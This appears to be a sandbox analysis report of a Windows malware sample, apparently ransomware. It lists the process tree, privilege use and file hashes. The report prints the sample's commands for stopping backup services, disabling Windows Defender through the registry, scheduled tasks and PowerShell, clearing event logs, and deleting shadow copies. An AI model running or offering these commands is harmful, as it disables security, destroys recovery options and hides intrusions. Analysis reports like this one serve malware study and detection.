wmic.exe Token: SeSystemProfilePrivilege 3828 wmic.exe Token: SeSystemtimePrivilege 3828 wmic.exe Token: SeProfSingleProcessPrivilege 3828 wmic.exe Token: SeIncBasePriorityPrivilege 3828 wmic.exe Token: SeCreatePagefilePrivilege 3828 wmic.exe Token: SeBackupPrivilege 3828 wmic.exe Token: SeRestorePrivilege 3828 wmic.exe Token: SeShutdownPrivilege 3828 wmic.exe Token: SeDebugPrivilege 3828 wmic.exe Token: SeSystemEnvironmentPrivilege 3828 wmic.exe Token: SeRemoteShutdownPrivilege 3828 wmic.exe Token: SeUndockPrivilege 3828 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4104 wrote to memory of 2804 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 87 PID 4104 wrote to memory of 2804 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 87 PID 4104 wrote to memory of 2804 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 87 PID 2804 wrote to memory of 4292 2804 net.exe 89 PID 2804 wrote to memory of 4292 2804 net.exe 89 PID 2804 wrote to memory of 4292 2804 net.exe 89 PID 4104 wrote to memory of 4380 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 90 PID 4104 wrote to memory of 4380 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 90 PID 4104 wrote to memory of 4380 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 90 PID 4380 wrote to memory of 4680 4380 net.exe 92 PID 4380 wrote to memory of 4680 4380 net.exe 92 PID 4380 wrote to memory of 4680 4380 net.exe 92 PID 4104 wrote to memory of 1544 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 93 PID 4104 wrote to memory of 1544 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 93 PID 4104 wrote to memory of 1544 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 93 PID 1544 wrote to memory of 3444 1544 net.exe 95 PID 1544 wrote to memory of 3444 1544 net.exe 95 PID 1544 wrote to memory of 3444 1544 net.exe 95 PID 4104 wrote to memory of 3084 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 96 PID 4104 wrote to memory of 3084 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 96 PID 4104 wrote to memory of 3084 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 96 PID 3084 wrote to memory of 1040 3084 net.exe 98 PID 3084 wrote to memory of 1040 3084 net.exe 98 PID 3084 wrote to memory of 1040 3084 net.exe 98 PID 4104 wrote to memory of 1888 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 99 PID 4104 wrote to memory of 1888 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 99 PID 4104 wrote to memory of 1888 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 99 PID 1888 wrote to memory of 3108 1888 net.exe 101 PID 1888 wrote to memory of 3108 1888 net.exe 101 PID 1888 wrote to memory of 3108 1888 net.exe 101 PID 4104 wrote to memory of 4552 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 102 PID 4104 wrote to memory of 4552 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 102 PID 4104 wrote to memory of 4552 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 102 PID 4552 wrote to memory of 3840 4552 net.exe 104 PID 4552 wrote to memory of 3840 4552 net.exe 104 PID 4552 wrote to memory of 3840 4552 net.exe 104 PID 4104 wrote to memory of 4600 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 105 PID 4104 wrote to memory of 4600 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 105 PID 4104 wrote to memory of 4600 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 105 PID 4600 wrote to memory of 2664 4600 net.exe 107 PID 4600 wrote to memory of 2664 4600 net.exe 107 PID 4600 wrote to memory of 2664 4600 net.exe 107 PID 4104 wrote to memory of 1720 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 108 PID 4104 wrote to memory of 1720 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 108 PID 4104 wrote to memory of 1720 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 108 PID 1720 wrote to memory of 2592 1720 net.exe 110 PID 1720 wrote to memory of 2592 1720 net.exe 110 PID 1720 wrote to memory of 2592 1720 net.exe 110 PID 4104 wrote to memory of 2468 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 111 PID 4104 wrote to memory of 2468 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 111 PID 4104 wrote to memory of 2468 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 111 PID 4104 wrote to memory of 4288 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 113 PID 4104 wrote to memory of 4288 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 113 PID 4104 wrote to memory of 4288 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 113 PID 4104 wrote to memory of 3420 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 115 PID 4104 wrote to memory of 3420 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 115 PID 4104 wrote to memory of 3420 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 115 PID 4104 wrote to memory of 2760 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 117 PID 4104 wrote to memory of 2760 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 117 PID 4104 wrote to memory of 2760 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 117 PID 4104 wrote to memory of 4364 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 119 PID 4104 wrote to memory of 4364 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 119 PID 4104 wrote to memory of 4364 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 119 PID 4104 wrote to memory of 2172 4104 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 122
Processes
-
C:\Users\Admin\AppData\Local\Temp\windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe"C:\Users\Admin\AppData\Local\Temp\windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:4292
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:4680
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:3444
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:1040
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:3108
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:3840
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:2664
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "UnistoreSvc_1a9ad" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_1a9ad" /y3⤵PID:2592
-
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:2468
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:4288
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:3420
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "vmicvss" start= disabled2⤵
- Launches sc.exe
PID:2760
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:4364
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:2172
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:4972
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "UnistoreSvc_1a9ad" start= disabled2⤵
- Launches sc.exe
PID:1432
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1192
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:5028
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:4744
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1788
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:2220
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:4676
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:5016
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1336
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3412
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:4568
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:4548
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1056
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:64
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:4016
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:4820
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1624
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:2920
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:4588
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:3528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:4508
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:3212
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:4632
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1816
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:3468
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:3804
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:4896
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:2888
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4024
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4660
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2168
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2756
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:4556
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2308
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1340
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4544
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3828
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:4396
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:4616
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4076
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2260
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4860
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD50f4bbc553c528755d6cc347208d7127d
SHA12f0500f1160c9bcbd23463f1ece4c7ff1bc54961
SHA256d68b3585445336084dbf6b4551a28bb461ce7c7d8a5d74a5cc0069b2eb9e0b06
SHA512262a7021ebc39433b20287652fee658cc1e2da7115e0ed12714d4da9511785111fe296f9f757326042bbafbba131788a3afa36ece1b3adcd7297ecbff342d211